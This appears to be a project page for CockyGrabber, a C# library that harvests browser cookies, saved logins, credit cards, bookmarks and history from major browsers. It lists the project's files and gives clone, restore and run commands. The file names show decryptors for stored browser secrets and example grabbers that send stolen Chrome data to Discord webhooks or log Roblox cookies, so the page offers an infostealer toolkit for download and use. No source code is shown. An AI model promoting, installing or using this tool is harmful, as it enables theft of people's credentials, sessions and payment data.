CockyGrabber
C# library for the collection of browser information such as cookies, logins, bookmarks and more
File Explorer
Download Latest Version (.zip)- BlinkGrabber.cs
- GeckoGrabber.cs
- GrabberError.cs
- GrabberException.cs
- BraveGrabber.cs
- ChromeGrabber.cs
- EdgeGrabber.cs
- FirefoxGrabber.cs
- OperaGrabber.cs
- OperaGxGrabber.cs
- UniversalGrabber.cs
- VivaldiGrabber.cs
- Bookmark.cs
- Cookie.cs
- CreditCard.cs
- Download.cs
- Form.cs
- Login.cs
- Site.cs
- Bookmark.cs
- Cookie.cs
- CreditCard.cs
- Download.cs
- Form.cs
- Login.cs
- Site.cs
- AssemblyInfo.cs
- AeadParameters.cs
- AesEngine.cs
- Arrays.cs
- BasicGcmExponentiator.cs
- Bits.cs
- Check.cs
- GcmBlockCipher.cs
- GcmUtilities.cs
- IAeadBlockCipher.cs
- IAeadCipher.cs
- IBlockCipher.cs
- ICipherParameters.cs
- IGcmExponentiator.cs
- IGcmMultiplier.cs
- KeyParameter.cs
- Longs.cs
- Pack.cs
- ParametersWithIV.cs
- Tables4kGcmMultiplier.cs
- Aes256GcmDecryptor.cs
- BlinkDecryptor.cs
- DPAPI.cs
- GeckoDecryptor.cs
- DynamicJsonConverter.cs
- Time.cs
- Tools.cs
- App.config
- CockyGrabber.csproj
- packages.config
- EmptyBlinkGrabber.cs
- EmptyGeckoGrabber.cs
- AssemblyInfo.cs
- EmptyGrabberTests.cs
- GrabberTests.cs
- App.config
- CockyGrabber.Test.csproj
- Globals.cs
- packages.config
- Tools.cs
- .gitignore
- CockyGrabber.sln
- CG_Logo-small.png
- CG_Logo.png
- home.md
- usage.md
- CookiePrinter.cs
- DiscordNetWebhookChromeGrabber.cs
- DiscordWebhookChromeGrabber.cs
- HistoryPrinter.cs
- LoginLogger.cs
- RobloxCookieLogger.cs
- Changelog.MD
- LICENSE
- README.md
# Installation Guide
1. Get the code
git clone https://github.com/MoistCoder/CockyGrabber
Downloads the entire project code from GitHub to your computer.
cd CockyGrabber
Moves into the project folder you just downloaded.
2. .NET
Medium RecommendedPrerequisites
cd CockyGrabber/CockyGrabber.Test
This project's files live in a subfolder, so move into it first.
dotnet restore
Downloads the packages the project depends on.
dotnet run
Builds the project and runs it immediately.
After dotnet run, check the message or address shown in the terminal.
// repository documentation
Was this content helpful?
(0 ratings)
